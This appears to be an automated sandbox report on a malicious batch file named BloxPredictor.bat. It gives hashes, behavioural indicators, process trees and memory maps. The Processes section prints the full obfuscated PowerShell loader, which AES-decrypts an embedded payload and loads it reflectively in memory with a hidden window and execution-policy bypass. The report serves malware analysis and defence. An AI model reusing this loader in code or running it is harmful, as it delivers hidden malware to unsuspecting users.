Analysis
-
max time kernel
116s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03-09-2022 03:15
Static task
static1
Behavioral task
behavioral1
Sample
BloxPredictor.bat
Resource
win7-20220812-en
General
-
Target
BloxPredictor.bat
-
Size
24KB
-
MD5
2ce736935920d83e5d55570739ca8c17
-
SHA1
9aab2f25403a0fe6921c152f61ed3d2ceacfad49
-
SHA256
001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76
-
SHA512
c58589dbcf5a23ca2cd9284733db20659b81850a33bc6eddf6379507fb7307a569019373168665fee93c02d42bdd3ee3c42377db7e16405e32f6e7554d8a3de0
-
SSDEEP
768:lsh2CrG0Qz6Ee7Z+x4a7eE8xRrQAh+WVqMJzO:BCrGrGE7x4a7eDfrQAh+SJzO
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
BloxPredictor.bat.exepid process 956 BloxPredictor.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1520 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
BloxPredictor.bat.exetaskmgr.exepid process 956 BloxPredictor.bat.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 868 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
BloxPredictor.bat.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 956 BloxPredictor.bat.exe Token: SeDebugPrivilege 868 taskmgr.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
Processes:
SndVol.exetaskmgr.exepid process 692 SndVol.exe 692 SndVol.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe -
Suspicious use of SendNotifyMessage 45 IoCs
Processes:
SndVol.exetaskmgr.exepid process 692 SndVol.exe 692 SndVol.exe 692 SndVol.exe 692 SndVol.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe 868 taskmgr.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 1520 wrote to memory of 536 1520 cmd.exe net.exe PID 1520 wrote to memory of 536 1520 cmd.exe net.exe PID 1520 wrote to memory of 536 1520 cmd.exe net.exe PID 536 wrote to memory of 916 536 net.exe net1.exe PID 536 wrote to memory of 916 536 net.exe net1.exe PID 536 wrote to memory of 916 536 net.exe net1.exe PID 1520 wrote to memory of 956 1520 cmd.exe BloxPredictor.bat.exe PID 1520 wrote to memory of 956 1520 cmd.exe BloxPredictor.bat.exe PID 1520 wrote to memory of 956 1520 cmd.exe BloxPredictor.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utPpZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($rwqec in $utPpZ) { if ($rwqec.StartsWith(':: ')) { $Wboiv = $rwqec.Substring(3); break; }; };$gxVLe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Wboiv);$GyhDr = New-Object System.Security.Cryptography.AesManaged;$GyhDr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GyhDr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GyhDr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YLrTLbeRJCsrE1rODFNA5EoKHyT/E5XO8ub+oldlmT0=');$GyhDr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WKvnZ2dZQdF2NCy0/rivZA==');$bYWQg = $GyhDr.CreateDecryptor();$gxVLe = $bYWQg.TransformFinalBlock($gxVLe, 0, $gxVLe.Length);$bYWQg.Dispose();$GyhDr.Dispose();$xJivi = New-Object System.IO.MemoryStream(, $gxVLe);$UhQFt = New-Object System.IO.MemoryStream;$RZDSG = New-Object System.IO.Compression.GZipStream($xJivi, [IO.Compression.CompressionMode]::Decompress);$RZDSG.CopyTo($UhQFt);$RZDSG.Dispose();$xJivi.Dispose();$UhQFt.Dispose();$gxVLe = $UhQFt.ToArray();$lwtWe = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($gxVLe);$erSXK = $lwtWe.EntryPoint;$erSXK.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\SndVol.exeSndVol.exe -f 45876373 245631⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/536-54-0x0000000000000000-mapping.dmp
-
memory/868-67-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-70-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-69-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-68-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/916-55-0x0000000000000000-mapping.dmp
-
memory/956-60-0x000007FEF3410000-0x000007FEF3E33000-memory.dmpFilesize
10.1MB
-
memory/956-64-0x00000000024CB000-0x00000000024EA000-memory.dmpFilesize
124KB
-
memory/956-63-0x00000000024C4000-0x00000000024C7000-memory.dmpFilesize
12KB
-
memory/956-61-0x000007FEF28B0000-0x000007FEF340D000-memory.dmpFilesize
11.4MB
-
memory/956-62-0x00000000024C4000-0x00000000024C7000-memory.dmpFilesize
12KB
-
memory/956-59-0x000007FEFB801000-0x000007FEFB803000-memory.dmpFilesize
8KB
-
memory/956-57-0x0000000000000000-mapping.dmp